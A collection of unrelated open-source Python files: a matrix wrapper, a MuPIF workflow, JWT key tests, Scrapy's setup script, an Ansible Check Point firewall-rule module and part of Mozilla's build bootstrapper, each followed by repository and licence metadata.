from __future__ import division import numpy as np from numpy.linalg import inv from numpy.core.umath_tests import inner1d def initialize_gpu(): from cudamat import cudamat as cm global cm # this class wraps matrix operations so that you can switch between numpy # and cuda operations cm.cuda_set_device(0) cm.init() # the keyword "inplace" for all of these functions re-uses the memory wherever # possible use this if you don't want allocate more memory on the gpu which can # be expensive, and don't need to reuse the matrix being transformed def random(size, typ='numpy'): return PMAT(np.random.uniform(size=size).reshape(1, size)) class PMAT: def __init__(self, mat, typ='numpy'): self.typ = typ if (type(mat) != np.ndarray and type(mat) != np.matrix and type(mat) != np.float64): self.typ = 'cuda' self.mat = mat elif typ == 'numpy': self.mat = mat elif typ == 'cuda': self.mat = cm.CUDAMatrix(mat) def multiply(self, mat): if self.typ == 'numpy': return PMAT(np.dot(self.mat, mat.mat)) elif self.typ == 'cuda': return PMAT(cm.dot(self.mat, mat.mat)) def exp(self, inplace=False): if self.typ == 'numpy': return PMAT(np.exp(self.mat)) elif self.typ == 'cuda': if inplace: self.mat = cm.exp(self.mat) return self else: target = cm.empty(self.mat.shape) cm.exp(self.mat, target=target) return PMAT(target) def log(self, inplace=False): if self.typ == 'numpy': return PMAT(np.log(self.mat)) elif self.typ == 'cuda': if inplace: self.mat = cm.log(self.mat) return self else: target = cm.empty(self.mat.shape) cm.log(self.mat, target=target) return PMAT(target) # find the first positive value along an axis - for use in doing random # choice def firstpositive(self, axis): if self.typ == 'numpy': return PMAT(np.argmax((self.mat + 1.0).astype('i4'), axis=axis)) def cumsum(self, axis): if self.typ == 'numpy': return PMAT(np.cumsum(self.mat, axis=axis)) # elif self.typ == 'cuda': # return PMAT(misc.cumsum(self.mat,axis=axis)) def argmax(self, axis): if self.typ == 'numpy': return PMAT(np.argmax(self.mat, axis=axis)) def transpose(self): if self.typ == 'numpy': return PMAT(np.transpose(self.mat)) # WARNING, always in place elif self.typ == 'cuda': self.mat.transpose() def reshape(self, rowlen, collen): if rowlen == -1: rowlen = self.size() // collen if collen == -1: collen = self.size() // rowlen if self.typ == 'numpy': self.mat = np.reshape(self.mat, (rowlen, collen), order='F') return self # WARNING, always in place elif self.typ == 'cuda': self.mat = self.mat.reshape((rowlen, collen)) return self def size(self): if self.typ == 'numpy': return self.mat.size elif self.typ == 'cuda': return self.mat.shape[0] * self.mat.shape[1] def sum(self, axis, shorten=0): if self.typ == 'numpy': # this is weird, but a numpy sum return flat array sometimes and # we want 2D matrices # return PMAT(np.sum(self.mat,axis=axis,dtype="float64")) if axis == 0: return PMAT(np.reshape( np.sum(self.mat, axis=axis, dtype="float64"), (1, -1))) if axis == 1: return PMAT(np.reshape( np.sum(self.mat, axis=axis, dtype="float64"), (-1, 1))) # return # PMAT(np.array(np.matrix(self.mat).sum(axis=axis,dtype="float64"))) elif self.typ == 'cuda': return PMAT(self.mat.sum(axis=axis)) def get_mat(self): if self.typ == 'numpy': return self.mat if self.typ == 'cuda': return self.mat.asarray() def shape(self): return self.mat.shape def subtract(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat - mat.mat) if self.typ == 'cuda': if inplace: self.mat.subtract(mat.mat) return self else: target = cm.empty(self.mat.shape) self.mat.subtract(mat.mat, target=target) return PMAT(target) def divide_by_row(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat / rowvec.mat) elif self.typ == 'cuda': if inplace: rowvec.mat.reciprocal() self.mat.mult_by_row(rowvec.mat) return self else: target = cm.empty(self.mat.shape) rowvec.mat.reciprocal() self.mat.mult_by_row(rowvec.mat, target=target) return PMAT(target) def multiply_by_row(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * rowvec.mat) elif self.typ == 'cuda': if inplace: self.mat.mult_by_row(rowvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult_by_row(rowvec.mat, target=target) return PMAT(target) def multiply_by_col(self, colvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * colvec.mat) elif self.typ == 'cuda': if inplace: self.mat.mult_by_col(colvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult_by_col(colvec.mat, target=target) return PMAT(target) def add_row_vec(self, rowvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + rowvec.mat) elif self.typ == 'cuda': if inplace: self.mat.add_row_vec(rowvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add_row_vec(rowvec.mat, target=target) return PMAT(target) def add_col_vec(self, colvec, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + colvec.mat) elif self.typ == 'cuda': if inplace: self.mat.add_col_vec(colvec.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add_col_vec(colvec.mat, target=target) return PMAT(target) def element_multiply(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat * mat.mat) elif self.typ == 'cuda': if inplace: self.mat = self.mat.mult(mat.mat) return self else: target = cm.empty(self.mat.shape) self.mat.mult(mat.mat, target=target) return PMAT(target) def element_add(self, mat, inplace=False): if self.typ == 'numpy': return PMAT(self.mat + mat.mat) elif self.typ == 'cuda': if inplace: self.mat = self.mat.add(mat.mat) return self else: target = cm.empty(self.mat.shape) self.mat.add(mat.mat, target=target) return PMAT(target) def clamptomin(self, val): assert self.typ == "numpy" self.mat[self.mat < val] = val def inftoval(self, val): assert self.typ == "numpy" self.mat[np.isinf(self.mat)] = val def nantoval(self, val): assert self.typ == "numpy" self.mat[np.isnan(self.mat)] = val def __str__(self): if self.typ == 'numpy': return str(self.mat) elif self.typ == 'cuda': return str(self.get_mat())
apdjustino/urbansim
urbansim/urbanchoice/pmat.py
Python
bsd-3-clause
8,585
import sys import Pyro5 sys.path.extend(['..', '../..']) import logging log = logging.getLogger() import threading import mupif as mp threading.current_thread().setName('ex10-main') @Pyro5.api.expose class Workflow10(mp.workflow.Workflow): def __init__(self, metadata={}): MD = { "ClassName": "Workflow10", "ModuleName": "main.py", "Name": "Example10 workflow", "ID": "workflow_10", "Description": "Calculates cummulative time times 2 using a simple PBS model", "Inputs": [ mp.workflow.workflow_input_targetTime_metadata, mp.workflow.workflow_input_dt_metadata ], "Outputs": [ # duplicates outputs of the contained model {'Type': 'mupif.Property', 'Type_ID': 'mupif.DataID.PID_Time', 'Name': 'Cummulated time value', 'Description': 'Cummulative time', 'Units': 's'} ], } mp.workflow.Workflow.__init__(self, metadata=MD) self.updateMetadata(metadata) self.daemon = None self.ns = None self.model_1_jobman = None self.model_1 = None def initialize(self, workdir='', metadata={}, validateMetaData=True, **kwargs): self.updateMetadata(dictionary=metadata) execMD = { 'Execution': { 'ID': self.getMetadata('Execution.ID'), 'Use_case_ID': self.getMetadata('Execution.Use_case_ID'), 'Task_ID': self.getMetadata('Execution.Task_ID') } } self.ns = mp.pyroutil.connectNameserver() self.daemon = mp.pyroutil.getDaemon(self.ns) # initialization code of model_1 self.model_1_jobman = mp.pyroutil.connectJobManager(self.ns, 'Mupif.JobManager@Example10') try: self.model_1 = mp.pyroutil.allocateApplicationWithJobManager(ns=self.ns, jobMan=self.model_1_jobman) log.info(self.model_1) except Exception as e: log.exception(e) self.model_1.initialize(workdir='', metadata=execMD) self.registerModel(self.model_1, "model_1") mp.Workflow.initialize(self, workdir=workdir, metadata={}, validateMetaData=validateMetaData, **kwargs) def get(self, objectTypeID, time=None, objectID=""): return self.model_1.get(objectTypeID=objectTypeID, time=time, objectID=objectID) def set(self, obj, objectID=""): super().set(obj=obj, objectID=objectID) def terminate(self): self.model_1.terminate() def finishStep(self, tstep): self.model_1.finishStep(tstep) def solveStep(self, tstep, stageID=0, runInBackground=False): time_property = mp.ConstantProperty(value=tstep.getTime().inUnitsOf(mp.U.s), propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) self.model_1.set(obj=time_property, objectID=1) self.model_1.solveStep(tstep=tstep, stageID=stageID, runInBackground=runInBackground) def getCriticalTimeStep(self): return self.model_1.getCriticalTimeStep() if __name__ == '__main__': # inputs targetTime = 2. dt = 1. # input properties param_targetTime = mp.ConstantProperty(value=targetTime, propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) param_dt = mp.ConstantProperty(value=dt, propID=mp.DataID.PID_Time, valueType=mp.ValueType.Scalar, unit=mp.U.s, time=None) workflow = Workflow10() # these metadata are supposed to be filled before execution md = { 'Execution': { 'ID': 'N/A', 'Use_case_ID': 'N/A', 'Task_ID': 'N/A' } } workflow.initialize(metadata=md) # set the input values defining targetTime and dt of the simulation workflow.set(param_targetTime, 'targetTime') workflow.set(param_dt, 'dt') workflow.solve() res_property = workflow.get(mp.DataID.PID_Time) value_result = res_property.inUnitsOf(mp.U.s).getValue() workflow.terminate() print('Simulation has finished.') # testing part print(value_result) if value_result is not None and abs(value_result - 6.) <= 1.e-4: print("Test OK") log.info("Test OK") else: print("Test FAILED") log.error("Test FAILED")
mupif/mupif
examples/Example10-jobMan-distrib-PBS/main.py
Python
lgpl-3.0
4,352
from django.test import TestCase from unittest import mock from .. import keys from . import data import os.path class PublicKeyTest(TestCase): def test_load_pem_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertIsInstance(key, keys.RSAPublicKey) def test_load_pem_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertIsInstance(key, keys.Ed25519PublicKey) def test_load_openssh_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_RSA) self.assertIsNone(exc) self.assertIsInstance(key, keys.RSAPublicKey) def test_load_openssh_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_ED25519) self.assertIsNone(exc) self.assertIsInstance(key, keys.Ed25519PublicKey) def test_load_invalid_pem_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_pem_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_openssh_rsa(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_RSA_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_load_invalid_openssh_ed25519(self): exc, key = keys.PublicKey.load_serialized_public_key(data.OPENSSH_ED25519_INVALID) self.assertIsInstance(exc, Exception) self.assertIsNone(key) def test_rsa_as_pem(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) pem = key.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PUBLIC KEY-----') self.assertEqual(pem[-1], '-----END PUBLIC KEY-----') def test_ed25519_as_pem(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) pem = key.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PUBLIC KEY-----') self.assertEqual(pem[-1], '-----END PUBLIC KEY-----') def test_rsa_fingerprint(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertEqual(key.fingerprint, '53c5b68c5ecba3e25df3f8326de6c0b0befb67e9217651a2f40e388f6567f056') def test_ed25519_fingerprint(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertEqual(key.fingerprint, 'cb10cd75c2eacf7aa2b5195bef9838cccd9d2ae4938601178808cb881b68ec72') def test_rsa_allowed_algorithms(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertEqual(key.allowed_algorithms, [ 'RS512', 'RS384', 'RS256', ]) def test_ed25519_allowed_algorithms(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertEqual(key.allowed_algorithms, [ 'EdDSA', ]) def test_unknown_key_type(self): with self.assertRaises(TypeError): keys.PublicKey.from_cryptography_pubkey(mock.MagicMock()) class PrivateKeyTest(TestCase): def test_generate_rsa(self): private = keys.RSAPrivateKey.generate() self.assertIsInstance(private, keys.RSAPrivateKey) self.assertIsInstance(private.public_key, keys.RSAPublicKey) def test_generate_ed25519(self): private = keys.Ed25519PrivateKey.generate() self.assertIsInstance(private, keys.Ed25519PrivateKey) self.assertIsInstance(private.public_key, keys.Ed25519PublicKey) def test_load_rsa_from_file(self): base = os.path.dirname(__file__) filepath = os.path.join(base, 'fixtures/dummy_rsa.privkey') private = keys.RSAPrivateKey.load_pem_from_file(filepath) self.assertIsInstance(private, keys.RSAPrivateKey) def test_load_rsa_from_file_encrypted(self): base = os.path.dirname(__file__) filepath = os.path.join(base, 'fixtures/dummy_rsa_encrypted.privkey') private = keys.RSAPrivateKey.load_pem_from_file(filepath, password=b'password') self.assertIsInstance(private, keys.RSAPrivateKey) def test_load_rsa(self): priv1 = keys.RSAPrivateKey.generate() priv2 = keys.RSAPrivateKey.load_pem(priv1.as_pem) self.assertEqual(priv2.as_pem, priv1.as_pem) def test_load_ed25519(self): priv1 = keys.Ed25519PrivateKey.generate() priv2 = keys.Ed25519PrivateKey.load_pem(priv1.as_pem) self.assertEqual(priv2.as_pem, priv1.as_pem) def test_rsa_as_pem(self): private = keys.RSAPrivateKey.generate() pem = private.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PRIVATE KEY-----') self.assertEqual(pem[-1], '-----END PRIVATE KEY-----') def test_ed25519_as_pem(self): private = keys.Ed25519PrivateKey.generate() pem = private.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PRIVATE KEY-----') self.assertEqual(pem[-1], '-----END PRIVATE KEY-----') def test_unknown_key_type(self): with self.assertRaises(TypeError): keys.PrivateKey.from_cryptography_privkey(mock.MagicMock())
crgwbr/asymmetric_jwt_auth
src/asymmetric_jwt_auth/tests/test_keys.py
Python
isc
5,861
from os.path import dirname, join from pkg_resources import parse_version from setuptools import setup, find_packages, __version__ as setuptools_version with open(join(dirname(__file__), 'scrapy/VERSION'), 'rb') as f: version = f.read().decode('ascii').strip() def has_environment_marker_platform_impl_support(): """Code extracted from 'pytest/setup.py' https://github.com/pytest-dev/pytest/blob/7538680c/setup.py#L31 The first known release to support environment marker with range operators it is 18.5, see: https://setuptools.readthedocs.io/en/latest/history.html#id235 """ return parse_version(setuptools_version) >= parse_version('18.5') install_requires = [ 'Twisted>=17.9.0', 'cryptography>=2.0', 'cssselect>=0.9.1', 'itemloaders>=1.0.1', 'parsel>=1.5.0', 'PyDispatcher>=2.0.5', 'pyOpenSSL>=16.2.0', 'queuelib>=1.4.2', 'service_identity>=16.0.0', 'w3lib>=1.17.0', 'zope.interface>=4.1.3', 'protego>=0.1.15', 'itemadapter>=0.1.0', ] extras_require = {} if has_environment_marker_platform_impl_support(): extras_require[':platform_python_implementation == "CPython"'] = [ 'lxml>=3.5.0', ] extras_require[':platform_python_implementation == "PyPy"'] = [ # Earlier lxml versions are affected by # https://foss.heptapod.net/pypy/pypy/-/issues/2498, # which was fixed in Cython 0.26, released on 2017-06-19, and used to # generate the C headers of lxml release tarballs published since then, the # first of which was: 'lxml>=4.0.0', 'PyPyDispatcher>=2.1.0', ] else: install_requires.append('lxml>=3.5.0') setup( name='Scrapy', version=version, url='https://scrapy.org', project_urls = { 'Documentation': 'https://docs.scrapy.org/', 'Source': 'https://github.com/scrapy/scrapy', 'Tracker': 'https://github.com/scrapy/scrapy/issues', }, description='A high-level Web Crawling and Web Scraping framework', long_description=open('README.rst').read(), author='Scrapy developers', maintainer='Pablo Hoffman', maintainer_email='[email protected]', license='BSD', packages=find_packages(exclude=('tests', 'tests.*')), include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': ['scrapy = scrapy.cmdline:execute'] }, classifiers=[ 'Framework :: Scrapy', 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries :: Application Frameworks', 'Topic :: Software Development :: Libraries :: Python Modules', ], python_requires='>=3.6', install_requires=install_requires, extras_require=extras_require, )
starrify/scrapy
setup.py
Python
bsd-3-clause
3,363
from unittest import TestCase
samratashok87/Rammbock
utest/test_templates/__init__.py
Python
apache-2.0
30
# # Copyright 2012 New Dream Network, LLC (DreamHost) # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg # Register options for the service OPTS = [ cfg.StrOpt('paste_config', default='api-paste.ini', help="Configuration file for WSGI definition of API."), cfg.StrOpt( 'auth_mode', default="keystone", help="Authentication mode to use. Unset to disable authentication"), ]
openstack/aodh
aodh/api/__init__.py
Python
apache-2.0
960
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import logging from pants.backend.jvm.targets.jvm_binary import JvmApp, JvmBinary from pants.backend.jvm.tasks.jvm_task import JvmTask from pants.base.exceptions import TaskError from pants.base.workunit import WorkUnit from pants.fs.fs import expand_path from pants.java.executor import CommandLineGrabber from pants.java.util import execute_java from pants.util.dirutil import safe_open _CWD_NOT_PRESENT = 'CWD NOT PRESENT' logger = logging.getLogger(__name__) def is_binary(target): return isinstance(target, JvmBinary) class JvmRun(JvmTask): @classmethod def register_options(cls, register): super(JvmRun, cls).register_options(register) register('--only-write-cmd-line', metavar='<file>', help='Instead of running, just write the cmd line to this file.') # Note the unusual registration pattern. This is so we can support three cases: # --cwd=<path> # --cwd (defaults to the value of 'const', which is None here) # No explicit --cwd at all (defaults to the value of 'default') register('--cwd', default=_CWD_NOT_PRESENT, nargs='?', help='Set the working directory. If no argument is passed, use the target path.') @classmethod def supports_passthru_args(cls): return True @classmethod def prepare(cls, options, round_manager): super(JvmRun, cls).prepare(options, round_manager) # TODO(John Sirois): these are fake requirements in order to force compile run before this # goal. Introduce a RuntimeClasspath product for JvmCompile and PrepareResources to populate # and depend on that. # See: https://github.com/pantsbuild/pants/issues/310 round_manager.require_data('resources_by_target') round_manager.require_data('classes_by_target') def __init__(self, *args, **kwargs): super(JvmRun, self).__init__(*args, **kwargs) self.only_write_cmd_line = self.get_options().only_write_cmd_line self.args.extend(self.get_passthru_args()) def execute(self): # The called binary may block for a while, allow concurrent pants activity during this pants # idle period. # # TODO(John Sirois): refactor lock so that I can do: # with self.context.lock.yield(): # - blocking code # # Currently re-acquiring the lock requires a path argument that was set up by the goal # execution engine. I do not want task code to learn the lock location. # http://jira.local.twitter.com/browse/AWESOME-1317 target = self.require_single_root_target() working_dir = None cwd_opt = self.get_options().cwd if cwd_opt != _CWD_NOT_PRESENT: working_dir = self.get_options().cwd if not working_dir: working_dir = target.address.spec_path logger.debug ("Working dir is {0}".format(working_dir)) if isinstance(target, JvmApp): binary = target.binary else: binary = target # We can't throw if binary isn't a JvmBinary, because perhaps we were called on a # python_binary, in which case we have to no-op and let python_run do its thing. # TODO(benjy): Some more elegant way to coordinate how tasks claim targets. if isinstance(binary, JvmBinary): executor = CommandLineGrabber() if self.only_write_cmd_line else None self.context.release_lock() result = execute_java( classpath=(self.classpath(confs=self.confs)), main=binary.main, executor=executor, jvm_options=self.jvm_options, args=self.args, workunit_factory=self.context.new_workunit, workunit_name='run', workunit_labels=[WorkUnit.RUN], cwd=working_dir, ) if self.only_write_cmd_line: with safe_open(expand_path(self.only_write_cmd_line), 'w') as outfile: outfile.write(' '.join(executor.cmd)) elif result != 0: raise TaskError('java %s ... exited non-zero (%i)' % (binary.main, result), exit_code=result)
tejal29/pants
src/python/pants/backend/jvm/tasks/jvm_run.py
Python
apache-2.0
4,234
# -*- encoding: utf-8 -*- # Module iainfgen from numpy import * def iainfgen(f, Iab): from iaunion import iaunion from iadil import iadil from ianeg import ianeg A, Bc = Iab y = iaunion( iadil(f, A), iadil( ianeg(f), Bc)) return y
mariecpereira/IA369Z
deliver/ia870/iainfgen.py
Python
mit
261
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = """ --- module: checkpoint_access_rule short_description: Manages access rules on Check Point over Web Services API description: - Manages access rules on Check Point devices including creating, updating, removing access rules objects, All operations are performed over Web Services API. version_added: "2.8" author: "Ansible by Red Hat (@rcarrillocruz)" options: name: description: - Name of the access rule. type: str layer: description: - Layer to attach the access rule to. required: True type: str position: description: - Position of the access rule. type: str source: description: - Source object of the access rule. type: str destination: description: - Destionation object of the access rule. type: str action: description: - Action of the access rule (accept, drop, inform, etc). type: str default: drop enabled: description: - Enabled or disabled flag. type: bool default: True state: description: - State of the access rule (present or absent). Defaults to present. type: str default: present auto_publish_session: description: - Publish the current session if changes have been performed after task completes. type: bool default: 'yes' auto_install_policy: description: - Install the package policy if changes have been performed after the task completes. type: bool default: 'yes' policy_package: description: - Package policy name to be installed. type: str default: 'standard' targets: description: - Targets to install the package policy on. type: list """ EXAMPLES = """ - name: Create access rule checkpoint_access_rule: layer: Network name: "Drop attacker" position: top source: attacker destination: Any action: Drop - name: Delete access rule checkpoint_access_rule: layer: Network name: "Drop attacker" """ RETURN = """ checkpoint_access_rules: description: The checkpoint access rule object created or updated. returned: always, except when deleting the access rule. type: list """ from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.connection import Connection from ansible.module_utils.network.checkpoint.checkpoint import checkpoint_argument_spec, publish, install_policy import json def get_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] payload = {'name': name, 'layer': layer} code, response = connection.send_request('/web_api/show-access-rule', payload) return code, response def create_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] position = module.params['position'] source = module.params['source'] destination = module.params['destination'] action = module.params['action'] payload = {'name': name, 'layer': layer, 'position': position, 'source': source, 'destination': destination, 'action': action} code, response = connection.send_request('/web_api/add-access-rule', payload) return code, response def update_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] position = module.params['position'] source = module.params['source'] destination = module.params['destination'] action = module.params['action'] enabled = module.params['enabled'] payload = {'name': name, 'layer': layer, 'position': position, 'source': source, 'destination': destination, 'action': action, 'enabled': enabled} code, response = connection.send_request('/web_api/set-access-rule', payload) return code, response def delete_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] payload = {'name': name, 'layer': layer, } code, response = connection.send_request('/web_api/delete-access-rule', payload) return code, response def needs_update(module, access_rule): res = False if module.params['source'] and module.params['source'] != access_rule['source'][0]['name']: res = True if module.params['destination'] and module.params['destination'] != access_rule['destination'][0]['name']: res = True if module.params['action'] != access_rule['action']['name']: res = True if module.params['enabled'] != access_rule['enabled']: res = True return res def main(): argument_spec = dict( name=dict(type='str', required=True), layer=dict(type='str'), position=dict(type='str'), source=dict(type='str'), destination=dict(type='str'), action=dict(type='str', default='drop'), enabled=dict(type='bool', default=True), state=dict(type='str', default='present') ) argument_spec.update(checkpoint_argument_spec) required_if = [('state', 'present', ('layer', 'position'))] module = AnsibleModule(argument_spec=argument_spec, required_if=required_if) connection = Connection(module._socket_path) code, response = get_access_rule(module, connection) result = {'changed': False} if module.params['state'] == 'present': if code == 200: if needs_update(module, response): code, response = update_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response else: pass elif code == 404: code, response = create_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response else: if code == 200: code, response = delete_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response elif code == 404: pass result['checkpoint_session_uid'] = connection.get_session_uid() module.exit_json(**result) if __name__ == '__main__': main()
hyperized/ansible
lib/ansible/modules/network/check_point/checkpoint_access_rule.py
Python
gpl-3.0
8,285
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # If we add unicode_literals, Python 2.6.1 (required for OS X 10.6) breaks. from __future__ import print_function import platform import sys import os.path import subprocess # Don't forgot to add new mozboot modules to the bootstrap download # list in bin/bootstrap.py! from mozboot.centosfedora import CentOSFedoraBootstrapper from mozboot.debian import DebianBootstrapper from mozboot.freebsd import FreeBSDBootstrapper from mozboot.gentoo import GentooBootstrapper from mozboot.osx import OSXBootstrapper from mozboot.openbsd import OpenBSDBootstrapper from mozboot.archlinux import ArchlinuxBootstrapper from mozboot.windows import WindowsBootstrapper from mozboot.util import ( get_state_dir, ) APPLICATION_CHOICE = ''' Please choose the version of Firefox you want to build: %s Note: (For Firefox for Android) The Firefox for Android front-end is built using Java, the Android Platform SDK, JavaScript, HTML, and CSS. If you want to work on the look-and-feel of Firefox for Android, you want "Firefox for Android Artifact Mode". Firefox for Android is built on top of the Gecko technology platform. Gecko is Mozilla's web rendering engine, similar to Edge, Blink, and WebKit. Gecko is implemented in C++ and JavaScript. If you want to work on web rendering, you want "Firefox for Android". If you don't know what you want, start with just "Firefox for Android Artifact Mode". Your builds will be much shorter than if you build Gecko as well. But don't worry! You can always switch configurations later. You can learn more about Artifact mode builds at https://developer.mozilla.org/en-US/docs/Artifact_builds. Your choice: ''' APPLICATIONS_LIST=[ ('Firefox for Desktop', 'browser'), ('Firefox for Android Artifact Mode', 'mobile_android_artifact_mode'), ('Firefox for Android', 'mobile_android'), ] # This is a workaround for the fact that we must support python2.6 (which has # no OrderedDict) APPLICATIONS = dict( browser=APPLICATIONS_LIST[0], mobile_android_artifact_mode=APPLICATIONS_LIST[1], mobile_android=APPLICATIONS_LIST[2], ) STATE_DIR_INFO = ''' The Firefox build system and related tools store shared, persistent state in a common directory on the filesystem. On this machine, that directory is: {statedir} If you would like to use a different directory, hit CTRL+c and set the MOZBUILD_STATE_PATH environment variable to the directory you'd like to use and re-run the bootstrapper. Would you like to create this directory? 1. Yes 2. No Your choice: ''' FINISHED = ''' Your system should be ready to build %s! ''' SOURCE_ADVERTISE = ''' Source code can be obtained by running hg clone https://hg.mozilla.org/mozilla-unified Or, if you prefer Git, you should install git-cinnabar, and follow the instruction here to clone from the Mercurial repository: https://github.com/glandium/git-cinnabar/wiki/Mozilla:-A-git-workflow-for-Gecko-development Or, if you really prefer vanilla flavor Git: git clone https://git.mozilla.org/integration/gecko-dev.git ''' CONFIGURE_MERCURIAL = ''' Mozilla recommends a number of changes to Mercurial to enhance your experience with it. Would you like to run a configuration wizard to ensure Mercurial is optimally configured? 1. Yes 2. No Please enter your reply: '''.lstrip() CLONE_MERCURIAL = ''' If you would like to clone the canonical Mercurial repository, please enter the destination path below. (If you prefer to use Git, leave this blank.) Destination directory for Mercurial clone (leave empty to not clone): '''.lstrip() DEBIAN_DISTROS = ( 'Debian', 'debian', 'Ubuntu', # Most Linux Mint editions are based on Ubuntu. One is based on Debian. # The difference is reported in dist_id from platform.linux_distribution. # But it doesn't matter since we share a bootstrapper between Debian and # Ubuntu. 'Mint', 'LinuxMint', 'Elementary OS', 'Elementary', '"elementary OS"', ) class Bootstrapper(object): """Main class that performs system bootstrap.""" def __init__(self, finished=FINISHED, choice=None, no_interactive=False, hg_configure=False): self.instance = None self.finished = finished self.choice = choice self.hg_configure = hg_configure cls = None args = {'no_interactive': no_interactive} if sys.platform.startswith('linux'): distro, version, dist_id = platform.linux_distribution() if distro in ('CentOS', 'CentOS Linux', 'Fedora'): cls = CentOSFedoraBootstrapper args['distro'] = distro elif distro in DEBIAN_DISTROS: cls = DebianBootstrapper elif distro == 'Gentoo Base System': cls = GentooBootstrapper elif os.path.exists('/etc/arch-release'): # Even on archlinux, platform.linux_distribution() returns ['','',''] cls = ArchlinuxBootstrapper else: raise NotImplementedError('Bootstrap support for this Linux ' 'distro not yet available.') args['version'] = version args['dist_id'] = dist_id elif sys.platform.startswith('darwin'): # TODO Support Darwin platforms that aren't OS X. osx_version = platform.mac_ver()[0] cls = OSXBootstrapper args['version'] = osx_version elif sys.platform.startswith('openbsd'): cls = OpenBSDBootstrapper args['version'] = platform.uname()[2] elif sys.platform.startswith('dragonfly') or \ sys.platform.startswith('freebsd'): cls = FreeBSDBootstrapper args['version'] = platform.release() 